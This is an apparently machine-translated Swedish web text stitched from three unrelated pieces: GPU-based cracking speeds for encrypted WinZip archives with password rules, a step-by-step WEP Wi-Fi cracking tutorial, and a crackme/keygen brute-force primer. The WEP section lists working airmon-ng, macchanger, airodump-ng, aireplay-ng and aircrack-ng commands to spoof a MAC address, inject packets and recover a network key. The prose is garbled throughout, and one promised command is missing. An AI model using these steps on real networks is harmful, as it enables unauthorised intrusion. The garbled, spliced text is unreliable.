Baserat på testerna vi har gjort kan du förmodligen söka efter den kombination du behöver med drygt 3 miljoner lösenord per sekund för en AES-krypterad fil med hjälp av ett par Radeon grafikkort HD 6990. Det betyder att det kommer att ta 7 397 år att söka efter lösenord på mellan ett och 10 tecken med hjälp av AMD Stream-acceleration. Även om du kan dubbla den hastigheten kommer det inte att hjälpa dig mycket. För att knäcka en fil på ungefär ett år måste du öka dina ansträngningar avsevärt - upp till 7 397 maskiner som arbetar dygnet runt.

I framtiden är det troligt att den genomsnittliga användaren kommer att ges möjlighet att komma åt denna klass av datorkraft med parallell beräkning. Nästa steg kommer att vara distribuerad datoranvändning. Parallel Password Recovery arbetar redan på ett sätt att tillämpa GPU-accelererad databehandling på många klienter.

I det här ögonblicket detta är inte ett problem som kommer att hålla dig vaken på natten. Som det gamla ordspråket säger, "om det finns en önskan, kommer det att finnas en möjlighet." Ända sedan det fanns lås har det funnits lockpicks. Om du vill att din information ska förbli säker, måste du förstå hur enkelt (eller svårt) det är att plocka upp ett lockpick för ditt lås. Det är vad lösenordsåterställningsverktyg gör. Överraskande nog håller WinZip-utvecklarna med oss ​​på denna punkt. Tom Vaughan, vicepresident för WinZip, sa: "Jag ser skaparna av verktyg för lösenordsåterställning som bra killar, inte skurkar. Endast programvara som du inte vet något om bör skrämma dig (programvara utvecklad av "bad guys" som är snabbare eller går sönder bättre än du kanske förväntar dig)".

Det kan låta som att vi säljer hemsk information eller försöker så missnöje bland läsarna, men vi hoppas att du kommer ihåg från den här artikeln att du inte kan köpa riktigt imponerande programvara. Grupper som arbetar med anpassad kryptering utvecklas alltid snabbare än de som finns tillgängliga i kommersiell skala. Och så, om du gör allt för att säkerställa säkerheten för dina filer, måste ditt lösenord uppfylla dessa grundläggande kriterier:

  • Bestå av minst 9 tecken;
  • Innehålla minst en stor bokstav;
  • Innehålla minst en liten bokstav;
  • innehålla minst en speciell karaktär, som "@" eller "!";
  • Innehåll minst ett nummer.

Dessa regler kommer att ge dina filer en chans att motstå angrepp av lösenordsknäckare. Hackare har ett obegränsat antal försök att knäcka ett lösenord. Och därför är det bara en tidsfråga att knäcka en krypterad fil. Det är därför säkerhetsexperter förstår att det verkliga målet är att neka tillgång till relevant data. Om det tar dig 50 år att knäcka lösenordet till WinZip-arkivet som innehåller information om hur vi sålde våra aktier förra veckan, då denna informationen kommer inte längre att vara viktigt. Skapa längre, godtyckliga lösenord och sedan kan du njuta av både skyddsnivån för din data och sinnesfrid.

Hur hackar man wifi? Många av oss har hört det när vi installerar WiFi-hotspots Under inga omständigheter bör du välja WEP-kryptering eftersom det är mycket lätt att bryta. Förmodligen är det bara ett fåtal som har försökt göra det på egen hand, och ungefär lika många vet hur det hela ser ut. Nedan finns en variant av att hacka en punkt med ett sådant krypteringsprotokoll, så att du tydligare kan inse hur verklig situationen är när någon ansluter till din superhemliga punkt, och vad ett sådant hack handlar om. Naturligtvis är det inte på något sätt möjligt att använda detta på någon annans router. Detta materialär endast i informationssyfte och kräver att krypteringsprotokoll som lätt kan knäckas överges.

För att hacka behöver en angripare:

  • lämplig wifi-adapter med möjlighet till injektion av förpackningar (till exempel Alfa AWUS036H)
  • BackTrack Live CD
  • faktiskt din poäng WiFi med WEP-kryptering, på vilken experimentet kommer att ställas in
  • tålamod

Efter lansering kommandorad BackTrack som heter Konsole måste du ange följande kommando:

Du kommer att se din nätverksgränssnitt, som kommer att kallas "ra0" eller något liknande. Kom ihåg detta namn. I framtiden kommer det att kallas (gränssnitt), och du ersätter det med ditt namn. Ange sedan fyra rader i följd:

airmon-ng stop (gränssnitt)
ifconfig (gränssnitt) ner
macchanger --mac 00:11:22:33:44:55 (gränssnitt)
airmon-ng start (gränssnitt)

Nu har vi en falsk MAC-adress. Stiga på:

airodump-ng (gränssnitt)

En lista över tillgängliga trådlösa nätverk. Så fort den dök upp på listan önskat nätverk, kan du trycka på Ctrl+C för att stoppa sökningen. Du måste kopiera nätverkets BSSID och komma ihåg kanalen (kolumn CH). Se också till att WEP är listat i ENC-kolumnen.

Nu börjar vi samla in information från detta rutnät:

airodump-ng -c (kanal) -w (filnamn) --bssid (bssid) (gränssnitt)

kanal är kanalen från CH-kolumnen, filnamn är namnet på filen som allt kommer att skrivas in i, och bssid är nätverksidentifieraren.

Du kommer att se något liknande det som visas på skärmdumpen. Lämna det här fönstret som det är. Öppna ett nytt Konsole-fönster och skriv:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (gränssnitt)

essid - SSID-namnet på offrets nätverk.

Vi väntar på meddelandet "Föreningen lyckad".

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (gränssnitt)

Nu måste du visa allt ditt tålamod och vänta tills numret i #Data-kolumnen passerar märket 10000.

När den nödvändiga mängden insamlad data har uppnåtts öppnar du det tredje Konsole-fönstret och anger:

aircrack-ng -b (bssid) (filnamn-01.cap)

Namnet du valde tidigare för filen anges som namn.

Om det lyckas kommer du att se raden "KEY FOUND", som innehåller nyckeln till nätverket.

INTRODUKTION

Krakmi det
program (vanligtvis liten storlek 1-2
kilobyte) som du behöver gissa lösenordet till
eller gör en nyckel. Krakmi brukar skrivas
att kontrollera kunskapsnivån hos personer inom området
kryptografi och hackingprogram. Krak mi
kom från den engelska frasen Crack Me -
knäcka mig.

på något sätt för mig
det krävdes att infoga stöd för "registrering"
nycklar till en kommersiella program. På
det ögonblicket av erfarenhet i denna fråga jag hade
ganska lite, på något sätt försökte jag hacka
några crackme, men ingenting fungerade och jag
kastade snabbt. Men när stimulansen kom, jag
Jag bestämde mig för att börja med crackme och nu gör jag det
lära sig olika krypteringsalgoritmer
data (som DES, TWODES, RSA och andra). Ganska
det är möjligt att mina nästa artiklar kommer att handla om
krypteringsalgoritmer,
användningen av dessa algoritmer är betydande
ökar tiden för hackning.

TYPER AV CRACKME

Med tanke på
olika sprickor, pekade jag ut två huvudsakliga
typer: krypterad med sprickor och innehåller
bara en algoritm.

Avkodare
Krakmi av det första slaget brukar innehålla
många "trick" mot felsökning (komplexitet
av dessa tekniker beror på kunskapsnivån
den som skrev krakmi, mest
vanliga knep går lätt förbi
människor och felsökare som arbetar under
skyddat läge och före
för att börja analysera algoritmen måste du få
dekrypterad kod. Desto svårare
dechiffrera, det (mest troligt) svårare
det kommer att finnas en algoritm för att välja ett lösenord (eller lösenord)
till honom. Mycket ofta visar det sig att
en algoritm på 300 byte kan vara svårare att bryta,
än att dechiffrera krakmi. Utan kunskap
matematiker rekommenderar inte heller att bryta sprickor
som använder RSA-algoritmen (algoritm
kryptering av data med en offentlig nyckel) eller
liknande. Naturligtvis är det bättre att börja med
okrypterade sprickor. Jag rekommenderar inte heller
försöker bryta crakmi från grupperna UCL, UCF, rPG, SOS
- Du slösar bara bort din tid.

I några
Krakmi måste ta reda på inte lösenordet, men
gör en registreringsnyckel. Bearbeta
skrot som crakmi inte mycket
skiljer sig från "lösenordet", men det är mer "ungefärligt"
att bryta program.

BRUTSALGORITM
CRACKME

Komplexa sprickor
bruten av brute-force lösenord, för
små program skrivs för detta. Oftare
det finns bara ett lösenord. Komplexitet
ökar på grund av storleken på det som krävs
lösenord och tecken som det måste
bestå.

Algoritm:

    Analys
    algoritm för lösenordsverifiering

    Skrift
    keygen (lösenordsgissare)

    Keygen lansering

ALGORITMANALYS
LÖSENORDSKOLL

För analys
Algoritmen bör studeras noggrant
lösenordsverifiering. För detta, din
favoritdebugger (Soft Ice, TD, DeGlucker...), du behöver
titta noga på vad som kontrolleras
Lösenord. Det går att kontrollera mot
sum (crc), i det här fallet, mest troligt lösenordet
måste söka med brutalt våld, annars kanske han
kolla efter någon karaktär då
du kan "gissa" hela lösenordet, eller åtminstone
några av dess karaktärer, resten måste
sök efter sökning.

Kontrollera
summan av kodsektionen, detta är ett tal (vanligtvis två
eller fyra byte, i krami kan
används och en byte) som
innehåller information om denna kod.
För krakmi används vanligtvis procedurer
primitiv kontrollsummaberäkning (till exempel
arkiverare använder crc32). Överväga
exempel på en algoritm som beräknar
kontrollsumma:

Till exempel alla
byten av plotten läggs ihop, och det visar sig
nummer är ett nummer och är en kontroll
arealbelopp. Vi har till exempel en tomt
kod, bestående av 5 byte:

001 004 000 005 100

Kontrollera
dess summa blir lika med 1+4+0+5+100=110.

Main
svårigheten att hacka sprickor som kontrollerar
lösenordet för crc är att crc inte kan dekomponeras! De där.
att känna till lösenordskontrollsumman - 110 vi inte
vi kan ta reda på vad åtminstone en av
lösenordselement.

SKRIVA EN KEYGEN

Praktiskt taget för
alla typer av kex behöver skriva en nyckelgen,
förutom lungorna. Kan lätt brytas
nästan alla krami bit hack (bit hack,
ersättning av flera byte), men författarna frågar
säg lösenordet, och det viktigaste går förlorat
intressera.

För att
för att hitta ett lösenord på 3 tecken krävs
ungefär ungefär:255
* 255 * 255 KOMBINATIONER

Kan reduceras
antal kombinationer, till exempel att veta att i
lösenord använder endast engelska
bokstäver (stora och små), då istället för 255
tecken kommer att behöva iterera endast 52. Om
endast siffror som vi upprepar över endast 10
tecken.

Keygen borde
spara räknaren för dekrypterad
kombinationer. Sedan brute-force lösenord
tar lång tid, gå sedan
du kan inte slå på datorn på ett par dagar,
helt plötsligt behöver du det. Kan sättas in i
keygen möjligheten att spara räknaren i
fil, och vid start läs den från filen och
fortsätt dekrypteringen från den avbrutna
positioner.

LANSERA KEYGEN

brute-force lösenord,
beroende på vissa parametrar (i
främst på antalet möjliga lösenord
tecken och lösenordsstorlek) kräver
en ganska lång tidsperiod.
Flera datorer kan användas
var och en kommer att kontrollera några
några av kombinationerna.